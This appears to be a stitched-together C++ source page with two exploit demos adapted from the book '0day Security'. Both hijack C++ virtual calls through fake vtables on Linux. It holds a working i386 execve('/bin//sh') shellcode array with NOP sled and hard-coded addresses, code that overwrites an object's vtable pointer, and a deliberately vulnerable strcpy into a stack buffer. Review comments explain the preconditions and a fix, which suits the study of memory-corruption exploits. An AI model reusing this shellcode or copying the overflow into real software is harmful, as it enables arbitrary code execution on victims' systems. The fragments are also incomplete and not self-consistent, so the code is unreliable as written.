// Small class with two virtual functions, used to illustrate how a vtable is
// laid out: with the usual ABI `show1` and `show2` occupy the first two slots,
// in declaration order, and `a`/`b` follow the vtable pointer in the object.
// NOTE(review): there is no virtual destructor, so deleting a derived object
// through a `test*` would be undefined behaviour — acceptable for a layout
// demo, not for a real polymorphic base class.
class test {
public:
    // Store the two payload values; `a` and `b` are otherwise left
    // uninitialised, exactly as in the original.
    void set(int m, int n) {
        this->a = m;
        this->b = n;
    }

    // First vtable slot.
    virtual void show1() {
        std::cout << "virtual function1\n";
    }

    // Second vtable slot.
    virtual void show2() {
        std::cout << "virtual function2\n";
    }

private:
    int a, b;
};
/**
 * file: V_table.cpp
 * g++ -z execstack -o Vtable V_table.cpp
 *
 * The general idea is as follows:
 * 1. add a fake vtable which contains our shellcode's address to the end of the shellcode
 * 2. make the object's vtable pointer point to the fake vtable
 * 3. call the virtual function to execute our shellcode
 *
 * Before starting, I tried to rewrite the vtable directly in code, but soon found that we have no permission to rewrite the vtable,
 * because the vtable is located in the .text section; this means the area can only be read and executed, which should be noted.
 *
 * The idea of this code comes from the book "0day Security: Software Vulnerability Analysis Technology",
 * and the original author's code works under Windows; here I have modified it to apply to Linux.
 *
 * the code executed successfully on ubuntu 16.04 LTS
 **/
// A class with a single virtual function. With the usual ABI the compiler
// places the vtable pointer at the start of the object, immediately followed
// by `buf`; main() relies on that adjacency.
class Failwest {
public:
    char buf[200];

    virtual void test(void) {
        std::cout << "This is a virtual function!" << std::endl;
    }
};

// Global instance whose buffer main() writes into, and a pointer through
// which the virtual call is made.
Failwest overflow;
Failwest *p;
// Entry point of the V_table.cpp demo: overwrite the vtable pointer of the
// global `overflow` object so that the next virtual call goes through a fake
// vtable placed inside `overflow.buf`.
// NOTE(review): the whole sequence depends on a fixed-address, executable data
// segment (non-PIE build plus `-z execstack`); NX, PIE/ASLR, or vtable-pointer
// validation (e.g. compiler CFI) each removes a precondition.
int main(void) {
    char *p_vtable;
    // `buf` is the first declared member, so the vptr is the pointer-sized
    // slot right before it — 8 bytes here, presumably because this is a 64-bit
    // build (no -m32 in the build line). Forming `buf - 8` is out-of-bounds
    // pointer arithmetic (UB) that happens to land on the vptr.
    p_vtable = overflow.buf - 8;  // point to virtual table
    // p_vtable = overflow
    // reset fake virtual table to 0x00601268
    // 0x00601268 is a hard-coded absolute address valid only for this exact
    // binary; per the comment below it is where the fake vtable ends up inside
    // the copied shellcode.
    p_vtable[0] = 0x68;
    p_vtable[1] = 0x12;
    p_vtable[2] = 0x60;
    p_vtable[3] = 0x00;
    // NOTE(review): `shellcode` is not declared in the V_table.cpp portion
    // shown here; the only `shellcode` array on this page belongs to the
    // 32-bit pass-canary.cpp demo, so this file presumably carries its own
    // 0x24-byte payload. memcpy also needs <cstring>, which this excerpt does
    // not include.
    memcpy(overflow.buf, shellcode, 0x24);  // set fake virtual function pointer in shellcode
    // actually, 0x0x00601268 is just locate in the end of shellcode,
    // in other words, we fake a virtual table at the end of shellcode which only contain one virtual func pointer
    // and the only one was point to our shellcode
    p = &overflow;
    // call the virtual function to trigger the shellcode
    p->test();
    return 0;
}
/**
 * file: pass-canary.cpp
 * g++ -m32 -z execstack -o pass-canary pass-canary.cpp
 *
 * The general idea is as follows:
 * 1. overflow on the stack and rewrite the pointer (*this) passed as the function's argument so that it refers to a fake virtual table
 * 2. make the fake virtual table's first item point to our shellcode
 * 3. call the virtual function to execute our shellcode
 * notice: we made the fake virtual table the shellcode's head, so we just overwrite the "*this" on the stack to point to the shellcode's address
 *
 * The idea of this code comes from the book "0day Security: Software Vulnerability Analysis Technology",
 * and the original author's code works under Windows; here I have modified it to apply to Linux.
 *
 * the code executed successfully on ubuntu 16.04 LTS
 **/
#include<cstring>
// shellcode's addr: 0x804a040
// Payload for the pass-canary.cpp demo. Per the author's notes the layout is:
//   first 4 bytes : a one-entry fake vtable holding 0x0804a044, i.e. the
//                   address of the code that immediately follows it
//   next 21 bytes : the i386 execve("/bin//sh") stub disassembled below
//   padding       : NOPs
//   last 4 bytes  : 0x0804a040, the start of this array — the value meant to
//                   replace the `this` pointer saved in Virtual::func's frame
// NOTE(review): every absolute address here is tied to one non-PIE 32-bit build
// in which `shellcode` is placed at 0x804a040; PIE/ASLR, a non-executable
// .data/.bss (dropping `-z execstack`), or vtable-pointer validation (CFI)
// each breaks the chain. The padding length is presumably matched to
// Virtual::func's frame (buf[100]) — confirm against the compiled binary.
char shellcode[] = "\x44\xa0\x04\x08"
"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
/**
 * xor ecx, ecx
 * mul ecx
 * mov al, 0Bh
 * push ecx
 * push 68732F2Fh
 * push 6E69622Fh
 * mov ebx, esp
 * int 80h
 **/
// padding
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x40\xa0\x04\x08"; // set the vtable pointer to point shellcode's header
// Deliberately vulnerable target of the pass-canary.cpp demo.
class Virtual {
public:
    // Copies `src` into a fixed 100-byte stack buffer with no length check:
    // any input longer than 99 bytes (plus the NUL) writes past `buf` into the
    // rest of the frame. The overflow is immediately followed by a virtual
    // call, which is what the demo relies on (see the file header): the
    // stack-protector check, where enabled, runs only in the epilogue, after
    // `bar()` has already been dispatched through the corrupted `this` —
    // presumably the reason for the name "pass-canary".
    // A bounded copy such as
    //   `strncpy(buf, src, sizeof buf - 1); buf[sizeof buf - 1] = '\0';`
    // or a std::string in place of the raw array removes the defect.
    void func(char *src) {
        char buf[100];
        strcpy(buf, src);
        bar();  // virtual function call
    }

    // Empty body; exists only so the class has a virtual function (and thus a
    // vtable pointer for `func` to dispatch through).
    virtual void bar() {
    }
};